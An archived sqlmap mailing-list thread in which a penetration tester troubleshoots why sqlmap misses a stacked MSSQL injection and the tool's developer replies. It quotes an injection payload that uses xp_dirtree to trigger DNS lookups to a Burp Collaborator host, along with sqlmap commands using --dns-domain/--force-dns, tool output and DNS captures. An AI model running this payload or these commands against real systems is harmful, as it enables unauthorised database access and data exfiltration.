>>> ------------------------------------------------------------
>>> ------------------
>>> Developer Access Program for Intel Xeon Phi Processors
>>> Access to Intel Xeon Phi processor-based developer platforms.
>>> With one year of Intel Parallel Studio XE.
>>> Training and support from Colfax.
>>> Order your platform today.http://sdm.link/intel
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Sqlmap/DNS exfil

[Mark M. <vv...@ho...>]

Right, that makes sense.  But at the same time, this is a valid injection (I can reproduce it manually).  Perhaps there's information I can provide to someone that would help improve the tool so it would catch this particular case and others like it?


On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <mir...@gm...<mailto:mir...@gm...>> wrote:

As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.

Bye

On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...<mailto:vv...@ho...>> wrote:

Thanks, that's good advice.  And I probably should post a little more detail on what I'm running here so others can see it as well.


Here's the command executing:


root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com<http://dns.lanternsec.com> --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.0.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:14

[16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
[16:56:14] [INFO] setting up DNS server instance
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[16:56:16] [INFO] testing connection to the target URL
[16:56:18] [INFO] testing if the target URL is stable
[16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
[16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
[16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
[16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[16:58:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times

[*] shutting down at 16:58:03



And then, my capture results for DNS traffic:


root@bass:~# tcpdump -n -i eth0 udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org<http://www.testsite.org>. (30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org<http://www.testsite.org>. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org<http://www.testsite.org>. (30)
16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org<http://www.testsite.org>. (30)
16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org<http://www.testsite.org>. (30)
16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org<http://www.testsite.org>. (30)
16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org<http://www.testsite.org>. (30)
16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org<http://www.testsite.org>. (30)
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org<http://www.testsite.org>. (30)
16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org<http://www.testsite.org>. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)


It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.


Thanks,

V

________________________________
From: Miroslav Stampar <mir...@gm...<mailto:mir...@gm...>>
Sent: Monday, December 19, 2016 4:10 PM
To: Mark M.
Cc: sql...@li...<mailto:sql...@li...>
Subject: Re: [sqlmap-users] Sqlmap/DNS exfil

I would suggest you to run the wireshark or similar when running the --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. other service running on :53).

About the "forcing" sqlmap for using dns-exfil. It will always at least try to test it at the start of a run (if other injection technique available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.

As said, the best advice I can give to you is to run the wireshark during the run and really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...<mailto:vv...@ho...>> wrote:

I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:


GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net<http://orator.net>\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1


To make that a little easier to read, the injected value is:


';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net<http://orator.net>\rtf'; exec master.dbo.xp_dirtree @q;--


I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page.  The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all.  I've provided the OS/DBMS and --level 5, but still no dice.  I'm using sqlmap v1.0.12#stable.


Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.)  However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?


Thanks

V



------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sql...@li...<mailto:sql...@li...>
https://lists.sourceforge.net/lists/listinfo/sqlmap-users




--
Miroslav Stampar
http://about.me/stamparm



--
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Sqlmap/DNS exfil

[Miroslav S. <mir...@gm...>]

My last message for today. You've said "However, it surprised me that what
appeared to be a fairly straight-forward stacked SQL injection would slip
by all of sqlmap's tests" <- you should really focus why stacked SQLi
hasn't worked in the first place. After you fix that one, you can try to
use dns-exfil to speed the data retrieval of otherwise slow stacked SQLi.

Bye

On Tue, Dec 20, 2016 at 12:04 AM, Miroslav Stampar <
mir...@gm...> wrote:

> As said, there should be at least one other SQLi technique available. In
> your case there is NONE. sqlmap will not blindly use dns-exfil if at least
> one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:
>
>> Thanks, that's good advice.  And I probably should post a little more
>> detail on what I'm running here so others can see it as well.
>>
>>
>> Here's the command executing:
>>
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
>> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
>> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
>> "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option
>> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
>> [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
>> comparison on a sequence matcher. If no dynamic nor injectable parameters
>> are detected, or in case of junk results, refer to user's manual paragraph
>> 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
>> 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter
>> 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
>> (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical
>> model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
>> (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
>> injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
>> Try to increase '--level'/'--risk' values to perform more tests. Also, you
>> can try to rerun by providing either a valid value for option '--string'
>> (or '--regexp'). If you suspect that there is some kind of protection
>> mechanism involved (e.g. WAF) maybe you could retry with an option
>> '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>>
>>
>> And then, my capture results for DNS traffic:
>>
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
>> www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
>> www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
>> www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
>> www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
>> www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
>> www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
>> 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>>
>> It doesn't seem like an injection pattern is being tried that is getting
>> the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>>
>> Thanks,
>>
>> V
>>
>> ------------------------------
>> *From:* Miroslav Stampar <mir...@gm...>
>> *Sent:* Monday, December 19, 2016 4:10 PM
>> *To:* Mark M.
>> *Cc:* sql...@li...
>> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you to run the wireshark or similar when running the
>> --dns-domain to properly debug what is going on. There could be really lots
>> of problems before you fine tune it (e.g. other service running on :53).
>>
>> About the "forcing" sqlmap for using dns-exfil. It will always at least
>> try to test it at the start of a run (if other injection technique
>> available). Also, it will prefer other "faster" techniques (ERROR and
>> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
>> which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give to you is to run the wireshark during
>> the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>>
>>> I have a situation where Burp has detected the following DNS
>>> exfiltration injection for a query parameter in a web app:
>>>
>>>
>>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20v
>>> archar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9
>>> fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.db
>>> o.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>>
>>>
>>> To make that a little easier to read, the injected value is:
>>>
>>>
>>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>>> @q;--
>>>
>>>
>>> I've modified the domain and verified that I receive the DNS requests on
>>> my local DNS server (the domain which I provide to sqlmap using the
>>> --dns-domain=xxx option) when the injection is manually sent to the page.
>>> The problem is, when I pass the request to sqlmap it's not detecting that
>>> there's an injection at all.  I've provided the OS/DBMS and --level 5, but
>>> still no dice.  I'm using sqlmap v1.0.12#stable.
>>>
>>>
>>> Since I've gotten many other injections to work in the past, I believe
>>> that I'm using sqlmap properly (formatting my request in a file
>>> appropriately, specifying the correct parameter to test, etc.)  However, it
>>> surprised me that what appeared to be a fairly straight-forward stacked SQL
>>> injection would slip by all of sqlmap's tests. Is there a way to force
>>> sqlmap to try DNS exfiltration injections despite no other injection
>>> technique succeeding?
>>>
>>>
>>> Thanks
>>>
>>> V
>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------
>>> ------------------
>>> Developer Access Program for Intel Xeon Phi Processors
>>> Access to Intel Xeon Phi processor-based developer platforms.
>>> With one year of Intel Parallel Studio XE.
>>> Training and support from Colfax.
>>> Order your platform today.http://sdm.link/intel
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Sqlmap/DNS exfil

[Miroslav S. <mir...@gm...>]

As said, there should be at least one other SQLi technique available. In
your case there is NONE. sqlmap will not blindly use dns-exfil if at least
one other technique worked.

Bye

On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:

> Thanks, that's good advice.  And I probably should post a little more
> detail on what I'm running here so others can see it as well.
>
>
> Here's the command executing:
>
>
> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
> "Windows" --threads 1
>         ___
>        __H__
>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
> |_ -| . [)]     | .'| . |
> |___|_  [']_|_|_|__,|  _|
>       |_|V          |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:56:14
>
> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
> [16:56:14] [INFO] setting up DNS server instance
> custom injection marking character ('*') found in option
> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
> [Y/n/q] n
> [16:56:16] [INFO] testing connection to the target URL
> [16:56:18] [INFO] testing if the target URL is stable
> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor injectable parameters
> are detected, or in case of junk results, refer to user's manual paragraph
> 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
> 'ProductCategory' might not be injectable
> [16:56:23] [INFO] testing for SQL injection on GET parameter
> 'ProductCategory'
> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause (IN)'
> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
> (comment)'
> [16:56:39] [WARNING] time-based comparison requires larger statistical
> model, please wait......... (done)
> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
> (IF)'
> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
> injectable
> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
> Try to increase '--level'/'--risk' values to perform more tests. Also, you
> can try to rerun by providing either a valid value for option '--string'
> (or '--regexp'). If you suspect that there is some kind of protection
> mechanism involved (e.g. WAF) maybe you could retry with an option
> '--tamper' (e.g. '--tamper=space2comment')
> [16:58:03] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 98 times
>
> [*] shutting down at 16:58:03
>
>
>
> And then, my capture results for DNS traffic:
>
>
> root@bass:~# tcpdump -n -i eth0 udp port 53
> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
> www.testsite.org. (30)
> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
> www.testsite.org. (30)
> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
> 173.213.231.200 (46)
> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
> www.testsite.org. (30)
> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
> www.testsite.org. (30)
> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
> 173.213.231.200 (46)
> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
> www.testsite.org. (30)
> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
> www.testsite.org. (30)
> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
> 173.213.231.200 (46)
> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
> www.testsite.org. (30)
> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
> www.testsite.org. (30)
> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
> 173.213.231.200 (46)
> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
> www.testsite.org. (30)
> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
> www.testsite.org. (30)
> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
> 173.213.231.200 (46)
> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>
>
> It doesn't seem like an injection pattern is being tried that is getting
> the DNS exfiltration to occur... or else I'm doing something else wrong.
>
>
> Thanks,
>
> V
>
> ------------------------------
> *From:* Miroslav Stampar <mir...@gm...>
> *Sent:* Monday, December 19, 2016 4:10 PM
> *To:* Mark M.
> *Cc:* sql...@li...
> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>
> I would suggest you to run the wireshark or similar when running the
> --dns-domain to properly debug what is going on. There could be really lots
> of problems before you fine tune it (e.g. other service running on :53).
>
> About the "forcing" sqlmap for using dns-exfil. It will always at least
> try to test it at the start of a run (if other injection technique
> available). Also, it will prefer other "faster" techniques (ERROR and
> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
> which will force the usage of dns-exfil even if ERROR/UNION are available.
>
> As said, the best advice I can give to you is to run the wireshark during
> the run and really see what is going on.
>
> Bye
>
> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>
>> I have a situation where Burp has detected the following DNS exfiltration
>> injection for a query parameter in a web app:
>>
>>
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%
>> 20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
>> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.d
>> bo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>
>>
>> To make that a little easier to read, the injected value is:
>>
>>
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>> @q;--
>>
>>
>> I've modified the domain and verified that I receive the DNS requests on
>> my local DNS server (the domain which I provide to sqlmap using the
>> --dns-domain=xxx option) when the injection is manually sent to the page.
>> The problem is, when I pass the request to sqlmap it's not detecting that
>> there's an injection at all.  I've provided the OS/DBMS and --level 5, but
>> still no dice.  I'm using sqlmap v1.0.12#stable.
>>
>>
>> Since I've gotten many other injections to work in the past, I believe
>> that I'm using sqlmap properly (formatting my request in a file
>> appropriately, specifying the correct parameter to test, etc.)  However, it
>> surprised me that what appeared to be a fairly straight-forward stacked SQL
>> injection would slip by all of sqlmap's tests. Is there a way to force
>> sqlmap to try DNS exfiltration injections despite no other injection
>> technique succeeding?
>>
>>
>> Thanks
>>
>> V
>>
>>
>>
>>
>> ------------------------------------------------------------
>> ------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today.http://sdm.link/intel
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Sqlmap/DNS exfil

[Mark M. <vv...@ho...>]

Thanks, that's good advice.  And I probably should post a little more detail on what I'm running here so others can see it as well.


Here's the command executing:


root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.0.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:14

[16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
[16:56:14] [INFO] setting up DNS server instance
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[16:56:16] [INFO] testing connection to the target URL
[16:56:18] [INFO] testing if the target URL is stable
[16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
[16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
[16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
[16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[16:58:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times

[*] shutting down at 16:58:03



And then, my capture results for DNS traffic:


root@bass:~# tcpdump -n -i eth0 udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
